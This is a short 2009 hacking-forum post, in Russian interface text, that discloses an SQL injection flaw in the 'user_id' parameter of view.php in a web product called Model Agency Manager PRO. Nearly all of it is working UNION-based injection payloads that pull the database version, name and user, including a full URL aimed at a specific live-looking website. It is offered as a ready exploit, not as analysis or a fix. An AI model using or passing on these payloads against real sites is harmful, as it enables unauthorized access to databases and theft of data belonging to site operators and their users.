13.11.2009, 00:15
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Model Agency Manager PRO
Bug : Sql Injection
view.php?user_id= [SQL]
Exploit :
Код:
1/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user()),0,0,0/*
or
Код:
1%20union%20select%20user(),2,3,4/*
site:
Код:
http://www.fashionpage.com/view.php?user_id=408/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user()),0,0,0/*&view=photos
|
|
|